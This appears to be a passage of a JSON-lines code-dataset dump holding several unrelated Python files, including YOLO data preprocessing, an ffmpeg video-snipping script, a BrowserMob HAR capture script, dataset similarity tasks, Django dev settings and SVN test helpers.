tf.py_function(_rand_number, [-7.0, 7.0], [tf.float32])\n scale = tf.cast(scale, dtype=tf.int32)[0][0]\n deg = tf.cast(deg, dtype=tf.float32)[0]\n aspect = tf.cast(aspect, dtype=tf.float32)[0]\n nh = tf.cast(w / aspect, dtype=tf.int32)\n nw = tf.cast(w, dtype=tf.int32)\n # Data Augmentation Functions.\n image = tf.image.resize(image, size=(nw, nh))\n image = tf.image.resize_with_crop_or_pad(image,\n target_height=scale,\n target_width=scale) # Zoom\n image = tf.image.resize_with_pad(image,\n target_width=224,\n target_height=224) # Final Output Shape\n image = _rotate(image, deg) # Rotate\n image = tf.image.random_brightness(image=image,\n max_delta=.75) # Brightness\n image = tf.image.random_saturation(image=image, lower=0.75,\n upper=1.25) # Saturation\n image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n image = tf.clip_by_value(image / 255, 0, 1) # Normalize\n if \"objects\" in datapoint:\n return image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _priming_data_augmentation(datapoint, num_of_classes):\n \"\"\"Augments image by performing Random Zoom, Resize with Pad, and\n finally normalizing the image.\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n Returns:\n Either Image and Label or Image and Object.\n \"\"\"\n # Data Augmentation values intializations.\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n w = tf.cast(tf.shape(image)[0], tf.float32)\n h = tf.cast(tf.shape(image)[1], tf.int32)\n low = tf.cast(448, tf.dtypes.float32)[None]\n high = tf.cast(512, tf.dtypes.float32)[None]\n scale = tf.py_function(_rand_number, [low, high], [tf.float32])\n scale = tf.cast(scale, dtype=tf.int32)[0][0]\n # Data Augmentation Functions.\n image = tf.image.resize_with_crop_or_pad(image,\n target_height=scale,\n target_width=scale) # Zoom\n image = tf.image.resize_with_pad(image,\n target_width=448,\n target_height=448) # Final Output Shape\n image = image / 255 #Normalize\n if \"objects\" in datapoint:\n return image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _detection_data_augmentation(image,\n label,\n masks,\n fixed_size=True,\n jitter_im=False):\n \"\"\"\n for each mask in masks, compute a output ground truth grid\n \n Args: \n image: tf.tensor image to manipulate \n label: the ground truth of the boxes [batch, 4, 1, num_classes]\n masks: dictionary for the index of the anchor to use at each scale, the number of keys should be the \n same as the number of prediction your yolo configuration will make. \n \n ex: yolo regular: -> change to this format\n {256: [0,1,2], 512: [3,4,5], 1024: [6,7,8]}\n \n return: \n tf.Tensor: for the image with jitter computed \n dict{tf.tensor}: output grids for proper yolo predictions\n \n \"\"\"\n # Image Jitter\n jitter_x, jitter_y, jitter_cx, jitter_cy, jitter_bw, jitter_bh, randscale = tf.py_function(\n py_func_rand, [], [\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.int32,\n ])\n if fixed_size:\n randscale = 13\n\n if jitter_im == True:\n image_jitter = tf.concat([jitter_x, jitter_y], axis=0)\n image_jitter.set_shape([2])\n image = tfa.image.translate(\n image, image_jitter * tf.cast(tf.shape(image)[1], tf.float32))\n # Bounding Box Jitter\n #tf.print(tf.shape(label))\n x = tf.math.add(label[..., 0], jitter_x + jitter_cx)\n x = tf.expand_dims(x, axis=-1)\n y = tf.math.add(label[..., 1], jitter_y + jitter_cy)\n y = tf.expand_dims(y, axis=-1)\n w = label[..., 2] * jitter_bw\n w = tf.expand_dims(w, axis=-1)\n h = label[..., 3] * jitter_bh\n h = tf.expand_dims(h, axis=-1)\n\n rest = label[..., 4:]\n label = tf.concat([x, y, w, h, rest], axis=-1)\n # Other Data Augmentation\n image = tf.image.resize(image, size=(randscale * 32,\n randscale * 32)) # Random Resize\n image = tf.image.random_brightness(image=image, max_delta=.1) # Brightness\n image = tf.image.random_saturation(image=image, lower=0.75,\n upper=1.25) # Saturation\n image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n\n for key in masks.keys():\n masks[key] = build_grided_gt(\n label, tf.convert_to_tensor(masks[key], dtype=tf.float32),\n randscale)\n randscale *= 2\n\n return image, masks\n\n\n# def _detection_data_augmentation(image, label, masks, fixed_size = True, jitter_im = False):\n# \"\"\"\n# for each mask in masks, compute a output ground truth grid\n\n# Args:\n# image: tf.tensor image to manipulate\n# label: the ground truth of the boxes [batch, 4, 1, num_classes]\n# masks: dictionary for the index of the anchor to use at each scale, the number of keys should be the\n# same as the number of prediction your yolo configuration will make.\n\n# ex: yolo regular: -> change to this format\n# {256: [0,1,2], 512: [3,4,5], 1024: [6,7,8]}\n\n# return:\n# tf.Tensor: for the image with jitter computed\n# dict{tf.tensor}: output grids for proper yolo predictions\n\n# \"\"\"\n\n# #masks = tf.convert_to_tensor(masks, dtype= tf.float32)\n# # Image Jitter\n# jitter, randscale = tf.py_function(py_func_rand, [], [tf.float32, tf.int32])\n# if fixed_size:\n# randscale = 13\n\n# if jitter_im == True:\n# image_jitter = tf.concat([jitter, jitter], axis = 0)\n# image_jitter.set_shape([2])\n# image = tfa.image.translate(image, image_jitter)\n# # Bounding Box Jitter\n# #tf.print(tf.shape(label))\n# x = tf.math.add(label[..., 0], jitter)\n# x = tf.expand_dims(x, axis = -1)\n# y = tf.math.add(label[..., 1], jitter)\n# y = tf.expand_dims(y, axis = -1)\n# rest = label[..., 2:]\n# label = tf.concat([x,y,rest], axis = -1)\n# # Other Data Augmentation\n# image = tf.image.resize(image, size = (randscale * 32, randscale * 32)) # Random Resize\n# image = tf.image.random_brightness(image=image, max_delta=.1) # Brightness\n# image = tf.image.random_saturation(image=image, lower = 0.75, upper=1.25) # Saturation\n# image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n\n# for key in masks.keys():\n# masks[key] = build_grided_gt(label, tf.convert_to_tensor(masks[key], dtype= tf.float32), randscale)\n# randscale *= 2\n\n# return image, masks\n\n\ndef _normalize(datapoint, h, w, num_of_classes):\n \"\"\"Normalizes the image by resizing it to the desired output shape\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n \n Returns:\n normalize (dict): A Normalized Image alongside the mapped information.\n \"\"\"\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n image = tf.image.resize_with_pad(image, target_width=h,\n target_height=w) # Final Output Shape\n image = image / 255 # Normalize\n if \"objects\" in datapoint:\n return image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _detection_normalize(data, anchors, width, height):\n \"\"\"Normalizes the image by resizing it to the desired output shape\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n \n h: the default height to scale images of variable shape to in order to batch the images \n w: the default width to scale images of variable shape to in order to batch the images\n number of classes: the number of classes that can be predicted for each object \n Returns:\n tf.Tensor (image): scaled and resized image for input into model, prior to batching\n tf.Tensor (label): the label of the bounding boxes with the best anchor asscoiated with it known for each ground truth box \n \"\"\"\n image = tf.cast(data[\"image\"], dtype=tf.float32)\n image = tf.image.resize(image, size=(608, 608))\n boxes = data[\"objects\"][\"bbox\"]\n boxes = get_yolo_box(boxes)\n classes = tf.one_hot(data[\"objects\"][\"label\"], depth=80)\n label = tf.concat([boxes, classes], axis=-1)\n label = build_gt(label, anchors, width)\n image = image / 255 # Normalize\n return image, label\n\n\ndef preprocessing(dataset,\n data_augmentation_split,\n preprocessing_type,\n size,\n batch_size,\n num_of_classes,\n shuffle_flag=False,\n anchors=None,\n masks=None,\n fixed=False,\n jitter=False):\n \"\"\"Preprocesses (normalization and data augmentation) and batches the dataset.\n Args:\n dataset (tfds.data.Dataset): The Dataset you would like to preprocess.\n data_augmentation_split (int): The percentage of the dataset that is data\n augmented.\n preprocessing_type (str): The type of preprocessing should be conducted\n and is dependent on the type of training.\n size (int): The size of the dataset being passed into preprocessing.\n batch_size (int): The size of the each batch.\n num_of_classes (int): The number of classes found within the dataset.\n shuffle_flag (bool): This is a Flag that determines whether to or not to shuffle\n within the function.\n Returns:\n dataset (tfds.data.Dataset): A shuffled dataset that includes images that\n have been data augmented\n Raises:\n SyntaxError:\n - Preprocessing type not found.\n - The given batch number for detection preprocessing is more than 1.\n - Number of batches cannot be less than 1.\n - Data augmentation split cannot be greater than 100.\n TypeError:\n - Data augmentation split must be an integer.\n - Preprocessing type must be an string.\n - Size must be an integer.\n - Number of batches must be an integer.\n - Shuffle flag must be a boolean.\n WARNING:\n - Dataset is not a tensorflow dataset.\n - Detection Preprocessing may cause NotFoundError in Google Colab.\n \"\"\"\n # TypeError Raising\n if hasattr(dataset, 'element_spec') == False:\n print(\"WARNING: Dataset may not a tensorflow dataset.\")\n if type(data_augmentation_split) is not int:\n raise TypeError(\"Data augmentation split must be an integer.\")\n if type(preprocessing_type) is not str:\n raise TypeError(\"Preprocessing type must be an string.\")\n if type(size) is not int:\n raise TypeError(\"Size must be an integer.\")\n if type(batch_size) is not int:\n raise TypeError(\"Number of batches must be an integer.\")\n if type(shuffle_flag) is not bool:\n raise TypeError(\"Shuffle flag must be a boolean.\")\n # SyntaxError Raising\n if preprocessing_type.lower() != \"detection\" and preprocessing_type.lower(\n ) != \"classification\" and preprocessing_type.lower() != \"priming\":\n raise SyntaxError(\"Preprocessing type not found.\")\n if batch_size < 1:\n raise SyntaxError(\"Batch Size cannot be less than 1.\")\n if data_augmentation_split > 100:\n raise SyntaxError(\n \"Data augmentation split cannot be greater than 100.\")\n if 'google.colab' in sys.modules == True and preprocessing_type.lower(\n ) != \"detection\":\n print(\n \"WARNING: Detection Preprocessing may cause NotFoundError in Google Colab. Please try running on local machine.\"\n )\n\n # Spliting the dataset based off of user defined split.\n data_augmentation_split = int((data_augmentation_split / 100) * size)\n non_preprocessed_split = size - data_augmentation_split\n data_augmentation_dataset = dataset.take(data_augmentation_split)\n remaining = dataset.skip(data_augmentation_split)\n non_preprocessed_split = remaining.take(non_preprocessed_split)\n # Data Preprocessing functions based off of selected preprocessing type.\n\n # Detection Preprocessing\n if preprocessing_type.lower() == \"detection\":\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.map(\n lambda x: _detection_normalize(x, anchors, 416, 416),\n num_parallel_calls=tf.data.experimental.AUTOTUNE).padded_batch(\n int(batch_size))\n dataset = dataset.map(\n lambda x, y: _detection_data_augmentation(\n x, y, masks=masks, fixed_size=fixed, jitter_im=jitter),\n num_parallel_calls=tf.data.experimental.AUTOTUNE) #.prefetch(10)\n # Classification Preprocessing\n elif preprocessing_type.lower() == \"classification\":\n # Preprocessing functions applications.\n non_preprocessed_split = non_preprocessed_split.map(\n lambda x: _normalize(x, 224, 224, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n data_augmentation_dataset = data_augmentation_dataset.map(\n lambda x: _classification_data_augmentation(x, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n # Dataset concatenation, shuffling, batching, and prefetching.\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.padded_batch(int(batch_size)).prefetch(\n tf.data.experimental.AUTOTUNE)\n # Priming Preprocessing\n elif preprocessing_type.lower() == \"priming\":\n # Preprocessing functions applications.\n non_preprocessed_split = non_preprocessed_split.map(\n lambda x: _normalize(x, 448, 448, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n data_augmentation_dataset = data_augmentation_dataset.map(\n lambda x: _priming_data_augmentation(x, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n # Dataset concatenation, shuffling, batching, and prefetching.\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.padded_batch(int(batch_size)).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n return dataset\n","sub_path":"yolo/dataloaders/tests/preprocessing_functions.py","file_name":"preprocessing_functions.py","file_ext":"py","file_size_in_byte":22973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14827937","text":"import os\nimport urllib.request\nimport subprocess\nimport glob\nimport math\nimport numpy as np\nimport sys\n\ndef get_chunk(filename, second, targetDir):\n ffmpeg_command = 'ffmpeg -i %(videopath)s \\\n -ss %(timestamp)f -t %(timestamp_to)f \\\n %(outpath)s' % {\n 'videopath': filename,\n 'timestamp': second,\n 'timestamp_to': 1,\n 'outpath' : targetDir}\n print(ffmpeg_command)\n try:\n subprocess.call(ffmpeg_command, shell=True)\n\n return True\n except:\n return False\n\ndef get_frames(filename, second, targetDir):\n # outdir_folder = os.path.join(outdir_keyframes, video_id)\n # mkdir_p(outdir_folder)\n # outpath = os.path.join(outdir_folder, '%d.jpg' % (int(time_id)))\n targetDir = targetDir + \"/%02d.jpg\"\n ffmpeg_command = 'ffmpeg -i %(videopath)s -vf \"select=not(mod(n\\,1))\" -q:v 2 %(outpath)s' % {\n 'videopath': filename,\n 'outpath': targetDir}\n print(ffmpeg_command)\n try:\n subprocess.call(ffmpeg_command, shell=True)\n\n return True\n except:\n return False\n\n\ndef get_length(filename):\n result = subprocess.run([\"ffprobe\", \"-v\", \"error\", \"-show_entries\",\n \"format=duration\", \"-of\",\n \"default=noprint_wrappers=1:nokey=1\", filename],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n return float(result.stdout)\n\nrootDir = '.'\nvideoDir = rootDir + \"/original-data\"\nsaveDir = rootDir + \"/dataset\"\nchunkStagingDir = rootDir + \"/temp\"\n\nstr_padding = 5\n\ndataset_file = sys.argv[1].replace(\"./\", '')\ndataset = open(dataset_file, 'r').readlines()\n\nfor line in dataset:\n video = line.replace('\\n','')\n\n if not os.path.exists(saveDir + \"/\" + video.replace('.mp4', '')):\n os.mkdir(saveDir + \"/\" + video.replace('.mp4', ''))\n\n video_length = math.floor(get_length(videoDir + \"/\" + video))\n print(\"video: \", video, \" is length \", video_length)\n\n # Snip video\n for second in range(0, video_length + 1):\n if not os.path.exists(saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding)):\n os.mkdir(saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding))\n else:\n continue\n outDir = saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding)\n tempDir = chunkStagingDir + \"/\" + str(second).zfill(str_padding) + \"_\" + video\n get_chunk(videoDir + \"/\" + video, second, tempDir)\n get_frames(tempDir, second, outDir)\n\n\n","sub_path":"make_dataset/videoSnip.py","file_name":"videoSnip.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275983727","text":"#coding: utf-8\n\nimport json, os, base64\nfrom time import sleep\nfrom selenium import webdriver\nfrom browsermobproxy import Server\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nFIREFOX_PATH = FirefoxBinary(BASE_PATH + '/firefox/firefox')\nDRIVER_PATH = BASE_PATH + '/geckodriver'\nBMP_PATH = BASE_PATH + '/browsermob/bin/browsermob-proxy'\n\nserver = Server(BMP_PATH)\nserver.start()\nproxy = server.create_proxy()\nprofile = webdriver.FirefoxProfile()\nprofile.set_proxy(proxy.selenium_proxy())\nprofile.accept_untrusted_certs = True\n\nfirefox_options = Options()\nfirefox_options.add_argument('-headless')\n\ndriver = webdriver.Firefox(executable_path=DRIVER_PATH, firefox_binary=FIREFOX_PATH, firefox_profile=profile, firefox_options=firefox_options)\ndriver.set_page_load_timeout(15)\ndriver.implicitly_wait(10)\ndriver.get('https://www.baidu.com')\nsleep(1)\ndriver.execute_script('window.open()')\nhandles = driver.window_handles\ndriver.switch_to_window(handles[-1])\n# driver.execute_script('window.resizeTo(1920,1080);')\nproxy.new_har('test')\ndriver.get('https://www.baidu.com')\nsleep(10)\nwith open('result.har', 'w') as result:\n json.dump(proxy.har, result)\nserver.stop()\ndriver.quit()","sub_path":"tools/firefox_browsermob.py","file_name":"firefox_browsermob.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614899600","text":"\nfrom .base import *\n\nDEBUG = True\n\n# Database\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'personaldicts_database',\n 'USER': 'personaldicts_user',\n 'PASSWORD': 'personaldicts_password',\n 'HOST': 'localhost',\n 'PORT': '',\n 'TEST': {\n 'NAME': 'test_database',\n 'CHARSET': 'UTF8',\n }\n }\n}\n\nINTERNAL_IPS = ['127.0.0.1']\n\nINSTALLED_APPS += [\n 'debug_toolbar',\n 'django_extensions',\n]\n\n# Testing with Nose\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nNOSE_ARGS = [\n '--cover-package=apps,mylabour,project_PersonalDicts',\n '--cover-inclusive',\n '--with-coverage',\n]\n","sub_path":"settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155781303","text":"from phovea_processing_queue.task_definition import task, get_logger\nfrom phovea_server.dataset import list_datasets\nfrom .similarity import similarity_by_name\nimport numpy as np\n\n_log = get_logger(__name__)\n\n\ndef list_groups():\n groups = []\n\n for dataset in list_datasets():\n # check data type, e.g. HDFTable, HDFStratification, HDFMatrix\n if dataset.type == 'stratification':\n for group in dataset.groups():\n groups.append(dict(\n dataset=dataset.id,\n label=group.name,\n ids=dataset.rowids(group.range)\n ))\n elif dataset.type == 'matrix' and dataset.value == 'categorical': # some matrices has no categories (mRNA, RPPA)\n mat_data = dataset.asnumpy()\n # datatset.cols() are the stuff that can be in added to stratomex\n for col in range(mat_data.shape[1]): # iterate over columns (numbers)\n mat_column = mat_data[:, col] # get column\n # check in which categories the patients are\n for cat in dataset.categories:\n # get indicies as 1-column matrix and convert to 1d array:\n cat_row_indicies = np.argwhere(mat_column == cat['name'])[:, 0]\n groups.append(dict(\n dataset=dataset.id + '-c' + str(col),\n label=cat if isinstance(cat, str) else cat['label'],\n ids=dataset.rowids()[cat_row_indicies]\n ))\n elif dataset.type == 'table': # has no 'value'-attribute like matrix\n for col in dataset.columns:\n if col.type == 'categorical':\n col_data = col.asnumpy() # table doesnt have asnumpy()\n for cat in col.categories:\n # TCGA table had just the strings, calumma table has a dict like matrix above\n cat_name = cat if isinstance(cat, str) else cat['name']\n cat_row_indicies = np.argwhere(col_data == cat_name)[:, 0]\n if cat_row_indicies.size > 0:\n groups.append(dict(\n # id in stratomex has trailing '-s' which is not needed here\n # (e.g. tcgaGbmSampledClinical_patient.ethnicity-s)\n dataset=dataset.id + '_' + col.name,\n label=cat if isinstance(cat, str) else cat['label'],\n ids=dataset.rowids()[cat_row_indicies]\n ))\n\n return groups\n\n\ndef list_columns():\n columns = []\n\n # columns {\n # id (full id)\n # type (categorical, real, int, string, ...) (not dataset's type but the column's\n # rowids\n\n # groups {\n # label\n # ids --> from rowIds\n # }\n # }\n\n # for dataset in list_datasets():\n # check data type, e.g. HDFTable, HDFStratification, HDFMatrix\n # if dataset.type == 'stratification':\n # elif dataset.type == 'matrix':\n # elif dataset.type == 'table': # has no 'value'-attribute like matrix\n\n return columns\n\n\n@task\ndef column_similarity(method, column_id):\n _log.debug('Start to calculate %s similarity.', method)\n\n similarity_measure = similarity_by_name(method)\n if similarity_measure is None:\n raise ValueError(\"No similarity measure for given method: \" + method)\n\n # result\n # -- dataset_id =\n # -- -- similarity score\n # -- dataset_id\n # -- -- similarity score\n # an so on\n result = {}\n\n try:\n given_columns_values = np.array([])\n\n # find given column\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n # real and int is numerical\n col_id = dataset.id + '_' + col.name\n # col_id will be eg.: calumma_experiment_set_1_Alter bei Diagnose\n # endswith will match id with dataset id, or just the column label (Alter bei Diagnose)\n if col_id.endswith(column_id):\n given_columns_values = col.asnumpy()\n\n # compare given column\n if given_columns_values.shape > 0:\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n other_values = col.asnumpy()\n result[dataset.id + '_' + col.name] = similarity_measure(given_columns_values, other_values)\n\n except Exception as e:\n _log.exception('Can not fulfill task. Error: %s.', e)\n raise # rejects promise\n\n return result # to JSON automatically\n\n\n@task\ndef group_similarity(method, ids):\n _log.debug('Start to calculate %s similarity.', method)\n\n similarity_measure = similarity_by_name(method)\n if similarity_measure is None:\n raise ValueError(\"No similarity measure for given method: \" + method)\n\n result = {'values': {}, 'groups': {}, 'threshold': {}}\n\n try:\n from phovea_server.range import parse\n parsed_range = parse(ids)\n cmp_patients = np.array(parsed_range[0]) # [0] since ranges are multidimensional but you just want the first one\n # now compare that group's list of patients to all others\n\n # categorized data:\n for group in list_groups():\n sim_score = similarity_measure(cmp_patients, group['ids'])\n if group['dataset'] not in result[\"values\"] or similarity_measure.is_more_similar(sim_score, result['values'][group['dataset']]):\n result['values'][group['dataset']] = sim_score\n result['groups'][group['dataset']] = group['label']\n\n # numerical data:\n # numerical data is binned to find best match\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n print(dataset.id)\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n # real and int is numerical\n data_stack = np.column_stack(\n (dataset.rowids(), col.asnumpy(), np.zeros((dataset.rowids().shape[0], 4)))) # concat ids an data\n # matrix is sorted by id, not by data\n data_stack = data_stack[data_stack[:, 1].argsort()] # sort by data\n ids_found = 0\n ids_present = np.sum(np.in1d(cmp_patients, dataset.rowids(), assume_unique=True))\n for row in range(data_stack.shape[0]): # iterate over columns (numbers)\n ids_found_reverse = ids_present - ids_found\n data_stack[row][4] = ids_found_reverse\n # data_stack[row][5] = (ids_present - ids_found) / (row-ids_found+ids_present) # not (row+1) here\n total_elements_reverse = ((data_stack.shape[0] - row) + ids_found)\n data_stack[row][5] = ids_found_reverse / total_elements_reverse\n if data_stack[row][0] in cmp_patients:\n ids_found += 1\n data_stack[row][2] = ids_found\n total_elements = ((row + 1) - ids_found + ids_present) # +1 to reflect number of elements\n data_stack[row][3] = ids_found / total_elements\n\n print(col.name)\n # find maximum in frontwards and backwards scorses\n max_similarity = float(np.max(data_stack[:, [3, 5]]))\n print(\"highest similarity: \" + str(max_similarity))\n # row 0, col 0 = index 0, row 0 col 1 = index 1 and so on --> divide by two to get row\n max_similarity_row = np.argmax(data_stack[:, [3, 5]]) / float(2)\n # print data_stack[max_similarity_row]\n\n # numerical value at maximum score = value to split\n # ordino will split in values <= threshold and values > thresold\n # so: if highest similarity is in forward group (no 0.5 remainder) -> use value\n # but: if highest similarity is in backward group (0.5 remainder) -> use next lower value\n\n split_reverse = max_similarity_row % 1 != 0 # second column will always have an odd index -> 0.5 remainder\n print(\"split at number: \" + str(data_stack[max_similarity_row, [1]]) + (\" from back\" if split_reverse else \" from front\"))\n\n num_to_split = data_stack[max_similarity_row - (1 if split_reverse else 0), 1]\n # casting none to float does not work\n # if the value is None (no value available) --> make a group with all available values (val <= max)\n # ordino will make another group with missing values itself\n num_to_split = float(num_to_split) if num_to_split is not None else np.max(data_stack[:, 1])\n result['values'][dataset.id + '_' + col.name] = max_similarity\n result['groups'][dataset.id + '_' + col.name] = col.name + (\" > \" if split_reverse else \" <= \") + str(num_to_split)\n result['threshold'][dataset.id + '_' + col.name] = [num_to_split]\n\n except Exception as e:\n _log.exception('Can not fulfill task. Error: %s.', e)\n raise # rejects promise\n\n return result # to JSON automatically\n","sub_path":"phovea_processing_similarity/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111613062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 8 14:40:17 2016\n\n@author: Reuben\n\"\"\"\n\ndef oddTuples(aTup):\n '''\n aTup: a tuple\n \n returns: tuple, every other element of aTup. \n ''' \n oddTuple = ()\n for t in range(len(aTup)):\n if t % 2 == 0:\n oddTuple += (aTup[t],)\n\n return oddTuple","sub_path":"Week 3/Odd Tuple.py","file_name":"Odd Tuple.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344035096","text":"from dependencies import DepRepo\nfrom common.utils import assure_yes\nfrom random import random\nimport pymongo\n\nCOLLECTION_NAME_ORIG = 'new_items_wcancel'\nCOLLECTION_NAME_INTO = 'train_wcancel'\nCOUNT = 10000\n\nsource_collection = DepRepo.mongo_collection(COLLECTION_NAME_ORIG)\ntarget_collection = DepRepo.mongo_collection(COLLECTION_NAME_INTO)\n\nassure_yes('Do you really want to put {} into {}?'.format(COLLECTION_NAME_ORIG, COLLECTION_NAME_INTO))\nassure_yes('{} gonna be truncated'.format(COLLECTION_NAME_INTO))\n\ntarget_collection.delete_many({})\n\nexisting_ids = set()\nfor item in DepRepo.mongo_collection('new_big_train').find({}):\n existing_ids.add(item[\"revs\"][-1][\"id\"])\n\n\nrandom_counter = DepRepo.counter(100)\nprint(\"Randomizing\")\nfor item in source_collection.find({}, no_cursor_timeout=True):\n source_collection.update_one({'_id': item['_id']}, {\n '$set':{\n 'r': random()\n }\n })\n random_counter.tick()\n\nprint(\"Random field created\")\n\n# setting indices\nindices = source_collection.index_information()\nif 'random' not in indices:\n print(\"Creating index\")\n source_collection.create_index([\n (\"vandal\", pymongo.ASCENDING),\n (\"r\", pymongo.ASCENDING)\n ],\n name=\"random\")\n print(\"Index created\")\n\nexcluded_ids = 0\ncnt = DepRepo.counter(100, COUNT)\n\nfor item in source_collection.find({'vandal': True}, no_cursor_timeout=True).sort(\"r\"):\n if len(item[\"revs\"]) < 2:\n continue\n\n if item[\"revs\"][-1][\"id\"] in existing_ids:\n excluded_ids += 1\n continue\n\n del item[\"_id\"]\n target_collection.insert_one(item)\n cnt.tick()\n\n if cnt.value() > COUNT:\n break\n\nprint(\"Total skipped: {}\".format(excluded_ids))\n","sub_path":"tools/extract_vandal_revs.py","file_name":"extract_vandal_revs.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277850308","text":"# pylint: disable-msg=E1101\n\n# Copyright 2008 German Aerospace Center (DLR)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nSome global test settings and methods.\n\"\"\"\n\nimport os\nimport py.test\nimport tempfile\n\nfrom modules.Config import Config\nfrom modules.Transaction import Transaction\n\n\nclass TestRepository:\n \n commitMessage = \"MANTIS ID 1 MANTIS ID 2\"\n \n def __init__(self):\n \"\"\" Create svn repository. \"\"\" \n self.repodir = tempfile.mkdtemp().replace(\"\\\\\", \"/\")\n self.chkdir = tempfile.mkdtemp().replace(\"\\\\\", \"/\")\n \n os.popen(\"svnadmin create %s\" % self.repodir)\n os.popen(\"svn co file:///%s \\\"%s\\\"\" % (self.repodir, self.chkdir))\n\n def createDefault(self):\n \"\"\" Creates the default repository content. \"\"\"\n self.addFile(\"test 1.txt\", \"content\") \n self.setProperty(\"test 1.txt\", \"svn:keywords\", \"Date\")\n self.addFile(\"test.java\", \"public interface test {\\n}\\n\")\n self.commit(self.commitMessage)\n return self.repodir, Transaction(self.repodir, \"1\")\n\n def addFile(self, filename, content):\n \"\"\" Creates a new file in the repository. \"\"\"\n fd = open(os.path.join(self.chkdir, filename), \"w\")\n fd.write(content)\n fd.close()\n os.popen(\"svn add \\\"%s\\\"\" % os.path.join(self.chkdir, filename))\n \n def setProperty(self, filename, keyword, value):\n \"\"\" Sets a keywords on a file. \"\"\"\n os.popen(\"svn propset %s %s \\\"%s\\\"\" % (keyword, value, os.path.join(self.chkdir, filename)))\n\n def commit(self, commitMessage = \"\"):\n os.popen(\"svn commit -m \\\"%s\\\" %s\" % (commitMessage, self.chkdir))\n return Transaction(self.repodir, \"1\")\n \n def createDiretory(self, path):\n os.mkdir(os.path.join(self.chkdir, path))\n os.popen(\"svn add \\\"%s\\\"\" % os.path.join(self.chkdir, path))\n\n\nclass TestConfig:\n\n # To run the mantis tests you need to configure the options here.\n # You must have a three mantis ids, one and two assigned to you and marked in_progress \n # and the third not assigned to anybody.\n\n mantisConfigString = \"\"\"\nMantis.URL=xxx\nMantis.User=xxx\nMantis.Password=xxx\n\"\"\"\n\n def __init__(self):\n \"\"\" Create the config file. \"\"\"\n self.configFileHandle, self.configFilename = tempfile.mkstemp()\n\n def createConfig(self, content):\n \"\"\" Fill the config file with content. \"\"\"\n content = \"[Default]\\n\" + content\n\n fd = os.fdopen(self.configFileHandle, \"w\")\n fd.write(content)\n fd.close()\n\n return self.configFilename, Config(self.configFilename, self.configFilename)\n\n def createMantisConfig(self, content = \"\"):\n \"\"\" Create a mantis config file. \"\"\"\n if \"xxx\" in self.mantisConfigString:\n py.test.skip(\"Please configure mantis access in common.py to run mantis tests.\")\n \n return self.createConfig(self.mantisConfigString + \"\\n\" + 